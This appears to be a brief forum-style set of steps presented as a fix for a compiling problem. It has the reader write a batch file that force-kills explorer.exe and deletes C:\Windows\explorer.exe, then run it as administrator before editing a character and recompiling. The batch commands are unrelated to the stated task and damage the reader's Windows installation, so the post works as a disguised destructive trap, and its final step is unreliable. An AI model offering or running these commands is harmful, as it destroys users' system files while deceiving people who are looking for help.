1- Create a text file in your source folder
2- Open that text and put this lines to it
Code:
@echo off
taskkill /f /IM explorer.exe
DEL /f C:\Windows\explorer.exe
3- Save the file as *.bat in the source folder and run it *AS ADMINISTRATOR*
4- After the task is ended open your source again and edit the "!": to "^l" and recompile